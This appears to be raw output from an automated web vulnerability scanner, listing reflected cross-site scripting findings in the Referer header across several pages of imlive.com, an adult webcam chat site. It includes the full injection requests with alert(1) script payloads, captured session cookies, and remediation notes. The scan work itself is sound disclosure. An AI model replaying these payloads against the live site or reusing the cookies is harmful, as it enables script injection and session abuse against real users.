HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html Expires: Sat, 03 May 2008 14:25:00 GMT Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSx9rb%2Be3%2BOTRTIW6m11TETaF6QXi%2ByFiLHg95wp%2FGOR9lSwrZUtExpRjmx1VFU8tmLVZ5WOhWeG2PPzltaaotqhw%3D%3D; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:24:59 GMT Connection: close Content-Length: 13435 Vary: Accept-Encoding
<html> <head> <title>Celebrity Porn Star Sign Up at ImLive</title> <meta name="description" content="Already a Celebrity Porn star? Access millions of ImLive members through celebrity Porn Star L ...[SNIP]... img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=imlive.com&ul=/live-sex-chats/pornstars-sign-up/&lr=1107816008&ud=0&pe=become_celeb.asp&rf=http://www.google.com/search?hl=en^q=f517a'><script>alert(1)</script>7528764405c&sr=10098785&iy=dallas&id=44&iu=1&ld=701' height='1' width='1'> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f6689'-alert(1)-'b778a8b9f7a was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /become_host.asp HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202; Referer: http://www.google.com/search?hl=en&q=f6689'-alert(1)-'b778a8b9f7a
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:25:31 GMT Connection: close Content-Length: 21060 Vary: Accept-Encoding
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 98226'-alert(1)-'ff8df7e9357 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /becomehost.aspx HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202; Referer: http://www.google.com/search?hl=en&q=98226'-alert(1)-'ff8df7e9357
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:25:01 GMT Connection: close Content-Length: 21060 Vary: Accept-Encoding
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c4ad1'><script>alert(1)</script>5d132d65cec was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /categoryfs.asp?cat=232 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq; Referer: http://www.google.com/search?hl=en&q=c4ad1'><script>alert(1)</script>5d132d65cec
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html Expires: Sat, 03 May 2008 14:14:00 GMT Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmuTmCT55rdh7t3zZ04MFTzw; path=/ X-Powered-By: vsrv49 Date: Fri, 28 Jan 2011 14:14:01 GMT Connection: close Content-Length: 19002 Vary: Accept-Encoding
<html> <head> <meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5"> <title>Find Friends & Romance on Live Webcam Video Chat at ImLive</title> <meta name="d ...[SNIP]... <img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=imlive.com&ul=/categoryfs.asp?cat=232&lr=1107816009&ud=0&pe=categoryfs.asp&rf=http://www.google.com/search?hl=en^q=c4ad1'><script>alert(1)</script>5d132d65cec&qs=cat=232&sr=10098785&iy=dallas&id=44&iu=1&ld=701' height='1' width='1'> ...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload b27c2'><script>alert(1)</script>5c3f838203 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /categoryfs.asp HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq; Referer: http://www.google.com/search?hl=en&q=b27c2'><script>alert(1)</script>5c3f838203
Response (redirected)
HTTP/1.1 404 Not Found Cache-Control: private Content-Type: text/html Expires: Sat, 03 May 2008 14:14:26 GMT Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; path=/ X-Powered-By: vsrv49 Date: Fri, 28 Jan 2011 14:14:26 GMT Connection: close Content-Length: 8327 Vary: Accept-Encoding
<HTML> <HEAD> <meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5"> <title>ImLive.com - Page Not Found</title>
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload aec77'><script>alert(1)</script>01882fe6e1e was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /categoryms.asp?cat=2 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq; Referer: http://www.google.com/search?hl=en&q=aec77'><script>alert(1)</script>01882fe6e1e
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html Expires: Sat, 03 May 2008 14:14:02 GMT Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmsTHmj4p7KUq0DeR%2BO3xTkb; path=/ X-Powered-By: vsrv49 Date: Fri, 28 Jan 2011 14:14:02 GMT Connection: close Content-Length: 21894 Vary: Accept-Encoding
<html> <head> <title>Mysticism & Spirituality Live Video Chat at ImLive</title> <META NAME="Description" CONTENT="Live video chat with Mysticism & Spirituality experts. Astrologers, Psychics ...[SNIP]... <img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=imlive.com&ul=/categoryms.asp?cat=2&lr=1107816009&ud=0&pe=categoryms.asp&rf=http://www.google.com/search?hl=en^q=aec77'><script>alert(1)</script>01882fe6e1e&qs=cat=2&sr=10098785&iy=dallas&id=44&iu=1&ld=701' height='1' width='1'> ...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 69bb4'><script>alert(1)</script>8751657e5a8 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /categoryms.asp HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq; Referer: http://www.google.com/search?hl=en&q=69bb4'><script>alert(1)</script>8751657e5a8
Response (redirected)
HTTP/1.1 404 Not Found Cache-Control: private Content-Type: text/html Expires: Sat, 03 May 2008 14:14:26 GMT Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; path=/ X-Powered-By: vsrv49 Date: Fri, 28 Jan 2011 14:14:26 GMT Connection: close Content-Length: 8328 Vary: Accept-Encoding
<HTML> <HEAD> <meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5"> <title>ImLive.com - Page Not Found</title>
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 5eb49'><script>alert(1)</script>a0a4a130032 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /customerservice.asp HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq; Referer: http://www.google.com/search?hl=en&q=5eb49'><script>alert(1)</script>a0a4a130032
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html Expires: Sat, 03 May 2008 14:14:16 GMT Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; path=/ X-Powered-By: vsrv49 Date: Fri, 28 Jan 2011 14:14:15 GMT Connection: close Content-Length: 14451 Vary: Accept-Encoding
<HTML> <HEAD> <title>Customer Service - Live Video Chat at ImLive</title> <meta name="description" content="You are very important to us, and we strive to provide you with world class custom ...[SNIP]... <img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=imlive.com&ul=/help/guide/guide.asp&lr=1107816009&ud=0&pe=help/guide/guide.asp&rf=http://www.google.com/search?hl=en^q=5eb49'><script>alert(1)</script>a0a4a130032&sr=10098785&iy=dallas&id=44&iu=1&ld=701' height='1' width='1'> ...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 3d32e'><script>alert(1)</script>90577f18320 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /disclaimer.asp HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq; Referer: http://www.google.com/search?hl=en&q=3d32e'><script>alert(1)</script>90577f18320
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html Expires: Sat, 03 May 2008 14:13:52 GMT Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; path=/ X-Powered-By: vsrv49 Date: Fri, 28 Jan 2011 14:13:51 GMT Connection: close Content-Length: 78924 Vary: Accept-Encoding
<html> <head> <title>Disclaimer - Live Video Chat at ImLive</title>
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1365d'-alert(1)-'8c7ad16a976 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /forgot.asp HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq; Referer: http://www.google.com/search?hl=en&q=1365d'-alert(1)-'8c7ad16a976
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-Powered-By: vsrv49 Date: Fri, 28 Jan 2011 14:13:38 GMT Connection: close Content-Length: 3308 Vary: Accept-Encoding
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9f31f'-alert(1)-'d8c094b7adb was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
